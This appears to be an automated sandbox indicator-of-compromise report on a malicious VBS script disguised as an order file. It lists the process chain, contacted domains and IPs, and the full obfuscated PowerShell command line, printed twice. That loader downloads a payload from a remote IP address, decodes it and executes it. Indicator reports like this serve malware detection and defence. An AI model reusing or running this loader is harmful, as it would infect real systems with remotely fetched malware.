IOC Report
Pedido02304024.vbs

Pedido02304024.vbs

ASCII text, with CRLF line terminators

initial sample

C:\Windows\System32\wscript.exe

C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pedido02304024.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kildematerialet107 = 1;$Kernevaabnet='Substrin';$Kernevaabnet+='g';Function ciceroner($Bldgringer){$Cholecystogram=$Bldgringer.Length-$Kildematerialet107;For($Brandsituationerne=1; $Brandsituationerne -lt $Cholecystogram; $Brandsituationerne+=(2)){$Categoricalness+=$Bldgringer.$Kernevaabnet.Invoke($Brandsituationerne, $Kildematerialet107);}$Categoricalness;}function Nonsensitizeds($whap){& ($Skimpiness) ($whap);}$Autoindtrks=ciceroner 'PM,o z i l lOaK/,5K. 0 ( W.iAnRd oUw sC NETC ,1S0.. 0M;I W i nu6 4.;W PxS6R4 ;, rRvK: 1 2B1A. 0 )S cG.egcKk oA/ 2E0R1S0 0l1 0Y1T .FTiOr,e,f o.xP/n1s2U1G.,0B ';$Hypsilophodontoid21=ciceroner 'KU.s ePr - A g e,nPt ';$Lydsidernes=ciceroner 'Uh tOtMp,:./ /L8B7 . 1 2 1w..1 0.5R.g1 6U3 /.BFo,lPd,kClUuSbHbSeCn s,. p cKzN ';$jvnhjde=ciceroner ',>, ';$Skimpiness=ciceroner 'AiJeUx, ';$equichangeable='Jynginae';Nonsensitizeds (ciceroner '.S,eRt -BC oMn,tPe nPtM -ZPSa tNh WT :E\SFTeGi ..t xCtU G-,V all,u,eR $AeSq uIipc,hFa nPg eBa b l.e ;M ');Nonsensitizeds (ciceroner ',i.f. E(BtKeKs tE- p a t h TB: \AFAe i..stGxTt ),{ eUxIiMt }W; ');$Nutmegged = ciceroner 'QeBc.hSoU %taOp p dSast aT%,\AcbeJi,l.oamEe.t eIr s,.BPBrAiU H&,&. eDc,hDoB $. ';Nonsensitizeds (ciceroner ' $ gSlRo bTa l.:,C oTnNv eSt h.=K(.c mDdT a/ac $RN uFt.mMe g,gPeFdL)P ');Nonsensitizeds (ciceroner 'F$OgKl o b aAlS:TL itn i e sFk r.i vUeVrAsr=F$NLByDdSs i d,eTrInReSs,.Ns.p lLi t ( $Hj.v n hFjLd,e,). ');$Lydsidernes=$Linieskrivers[0];Nonsensitizeds (ciceroner 'T$Og lEo b aUlr: RAe fSe.r eLn c e.v rTkDe rw=PNCe w - O b j.ePcStU .ShyPsPt eNmD. N e.tG.JWEe bFC.lTi e,n t. ');Nonsensitizeds (ciceroner 'U$UR.eKfAe rDe,nsc e,v r.kIe rG.VH e aPd eDr,sO[R$MHRyVpFs iLlAo.pFhIo dGo,n tDo.iIdu2,1O].=.$UA uFt oUi n,d t r.k sL ');$Superrheumatized=ciceroner 'LR.eHfSeFr e,n cte.vBrVkOeVr .IDKo w nPl oNa d F i l.ec( $.LIy,d.sBiIdBeSrSn.e.sD, $.BAe,tTa g.eBtSh,e.dIsG), ';$Superrheumatized=$Conveth[1]+$Superrheumatized;$Betagetheds=$Conveth[0];Nonsensitizeds (ciceroner ' $AgFl o,bBa.l.:MDTvHnKl d.eEnC=I(UTFe s,tR- PMa.t.h $TBPe tSaMgMe tNhKe d s ) ');while (!$Dvnlden) {Nonsensitizeds (ciceroner '.$PgFlToSb aPlS: OSdTiKnSi aNn = $.t r u.eO ') ;Nonsensitizeds $Superrheumatized;Nonsensitizeds (ciceroner ' SWtBa.r.t -TS l.e e pS E4. ');Nonsensitizeds (ciceroner 'B$ g lEo.bCaWl,:,D vBnBlPdBeIn = (RTUe,s,tR- P.aSt ha B$,Bse t aAg e,tDh e.dDsP) ') ;Nonsensitizeds (ciceroner 'D$ gMlQo b,aCln: B.uVs t iDa n =F$RgSl.o bSaDlB:OO uOtSs m o k.e s +A+ % $,L iEn,iae sHkSriiBv eSrMsE.Kc.obuRn t ') ;$Lydsidernes=$Linieskrivers[$Bustian];}Nonsensitizeds (ciceroner 'G$ g l o bua l,: A mFpPhSo.lOyPt e,2,0m4 D=, SG e,t -,C o.n t eSn tS $ BBe.tdaEgEe t h eMd,s. ');Nonsensitizeds (ciceroner 'E$Fg lCoAbUa,lC:HSGtDa mSmAe,r,i nEgFlSyD F=. W[LS y,sWtKeBmT.TCCosn vSeSrAt.]R:G:CFqr oTm,BKa s eS6K4 SRt,r iVnUgS(,$ A,mBpPhJoAl.yItTe 2 0,4 )H ');Nonsensitizeds (ciceroner 'M$Sg l.oAbBa lS:UE pDiBs c o pDi sFeBd I=h O[PS yPsGtHe.m . T.e.xMt .KE nNc oGdNi n g.]C:K:SAgSTCMITIG. G eItGSCt,r,i.nag,(O$ZS.t aUm,mCeUrBi.nIg.lNy )F ');Nonsensitizeds (ciceroner '.$ gFl o.bUa,lD: CFu,rCcSu lMi.o.sC=C$.EBpJi.s,cAo,pPibsTe d .Es.uUb sOt.r i n.gF(A3T2.5 4 3.0s, 2 6.5.5B8U)A ');Nonsensitizeds $Curculios;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Kildematerialet107 = 1;$Kernevaabnet='Substrin';$Kernevaabnet+='g';Function ciceroner($Bldgringer){$Cholecystogram=$Bldgringer.Length-$Kildematerialet107;For($Brandsituationerne=1; $Brandsituationerne -lt $Cholecystogram; $Brandsituationerne+=(2)){$Categoricalness+=$Bldgringer.$Kernevaabnet.Invoke($Brandsituationerne, $Kildematerialet107);}$Categoricalness;}function Nonsensitizeds($whap){& ($Skimpiness) ($whap);}$Autoindtrks=ciceroner 'PM,o z i l lOaK/,5K. 0 ( W.iAnRd oUw sC NETC ,1S0.. 0M;I W i nu6 4.;W PxS6R4 ;, rRvK: 1 2B1A. 0 )S cG.egcKk oA/ 2E0R1S0 0l1 0Y1T .FTiOr,e,f o.xP/n1s2U1G.,0B ';$Hypsilophodontoid21=ciceroner 'KU.s ePr - A g e,nPt ';$Lydsidernes=ciceroner 'Uh tOtMp,:./ /L8B7 . 1 2 1w..1 0.5R.g1 6U3 /.BFo,lPd,kClUuSbHbSeCn s,. p cKzN ';$jvnhjde=ciceroner ',>, ';$Skimpiness=ciceroner 'AiJeUx, ';$equichangeable='Jynginae';Nonsensitizeds (ciceroner '.S,eRt -BC oMn,tPe nPtM -ZPSa tNh WT :E\SFTeGi ..t xCtU G-,V all,u,eR $AeSq uIipc,hFa nPg eBa b l.e ;M ');Nonsensitizeds (ciceroner ',i.f. E(BtKeKs tE- p a t h TB: \AFAe i..stGxTt ),{ eUxIiMt }W; ');$Nutmegged = ciceroner 'QeBc.hSoU %taOp p dSast aT%,\AcbeJi,l.oamEe.t eIr s,.BPBrAiU H&,&. eDc,hDoB $. ';Nonsensitizeds (ciceroner ' $ gSlRo bTa l.:,C oTnNv eSt h.=K(.c mDdT a/ac $RN uFt.mMe g,gPeFdL)P ');Nonsensitizeds (ciceroner 'F$OgKl o b aAlS:TL itn i e sFk r.i vUeVrAsr=F$NLByDdSs i d,eTrInReSs,.Ns.p lLi t ( $Hj.v n hFjLd,e,). ');$Lydsidernes=$Linieskrivers[0];Nonsensitizeds (ciceroner 'T$Og lEo b aUlr: RAe fSe.r eLn c e.v rTkDe rw=PNCe w - O b j.ePcStU .ShyPsPt eNmD. N e.tG.JWEe bFC.lTi e,n t. ');Nonsensitizeds (ciceroner 'U$UR.eKfAe rDe,nsc e,v r.kIe rG.VH e aPd eDr,sO[R$MHRyVpFs iLlAo.pFhIo dGo,n tDo.iIdu2,1O].=.$UA uFt oUi n,d t r.k sL ');$Superrheumatized=ciceroner 'LR.eHfSeFr e,n cte.vBrVkOeVr .IDKo w nPl oNa d F i l.ec( $.LIy,d.sBiIdBeSrSn.e.sD, $.BAe,tTa g.eBtSh,e.dIsG), ';$Superrheumatized=$Conveth[1]+$Superrheumatized;$Betagetheds=$Conveth[0];Nonsensitizeds (ciceroner ' $AgFl o,bBa.l.:MDTvHnKl d.eEnC=I(UTFe s,tR- PMa.t.h $TBPe tSaMgMe tNhKe d s ) ');while (!$Dvnlden) {Nonsensitizeds (ciceroner '.$PgFlToSb aPlS: OSdTiKnSi aNn = $.t r u.eO ') ;Nonsensitizeds $Superrheumatized;Nonsensitizeds (ciceroner ' SWtBa.r.t -TS l.e e pS E4. ');Nonsensitizeds (ciceroner 'B$ g lEo.bCaWl,:,D vBnBlPdBeIn = (RTUe,s,tR- P.aSt ha B$,Bse t aAg e,tDh e.dDsP) ') ;Nonsensitizeds (ciceroner 'D$ gMlQo b,aCln: B.uVs t iDa n =F$RgSl.o bSaDlB:OO uOtSs m o k.e s +A+ % $,L iEn,iae sHkSriiBv eSrMsE.Kc.obuRn t ') ;$Lydsidernes=$Linieskrivers[$Bustian];}Nonsensitizeds (ciceroner 'G$ g l o bua l,: A mFpPhSo.lOyPt e,2,0m4 D=, SG e,t -,C o.n t eSn tS $ BBe.tdaEgEe t h eMd,s. ');Nonsensitizeds (ciceroner 'E$Fg lCoAbUa,lC:HSGtDa mSmAe,r,i nEgFlSyD F=. W[LS y,sWtKeBmT.TCCosn vSeSrAt.]R:G:CFqr oTm,BKa s eS6K4 SRt,r iVnUgS(,$ A,mBpPhJoAl.yItTe 2 0,4 )H ');Nonsensitizeds (ciceroner 'M$Sg l.oAbBa lS:UE pDiBs c o pDi sFeBd I=h O[PS yPsGtHe.m . T.e.xMt .KE nNc oGdNi n g.]C:K:SAgSTCMITIG. G eItGSCt,r,i.nag,(O$ZS.t aUm,mCeUrBi.nIg.lNy )F ');Nonsensitizeds (ciceroner '.$ gFl o.bUa,lD: CFu,rCcSu lMi.o.sC=C$.EBpJi.s,cAo,pPibsTe d .Es.uUb sOt.r i n.gF(A3T2.5 4 3.0s, 2 6.5.5B8U)A ');Nonsensitizeds $Curculios;"

C:\Program Files (x86)\Windows Mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe

"C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe"

C:\Windows\SysWOW64\AtBroker.exe

"C:\Windows\SysWOW64\AtBroker.exe"

C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe

"C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe"

C:\Program Files (x86)\Windows Mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\Windows Mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\Firefox.exe"

http://www.theplays.shop/gnbc/

172.67.152.117

http://pesterbdd.com/images/Pester.png

unknown

http://www.theplays.shop/gnbc/?qRm=CFA+HkVxdb5EmOTiyKOWRwF+pLrZo+HX//sAjaoe71zU1jru2C8H4zHuCGW9CrkOmabuxLOltM6mSwZ40cUWhJKDDEbSgCXb2jOP4Eqmg9UuBFGRNSISgVk=&ALLPg=JbKtchOp7P4H8n8

172.67.152.117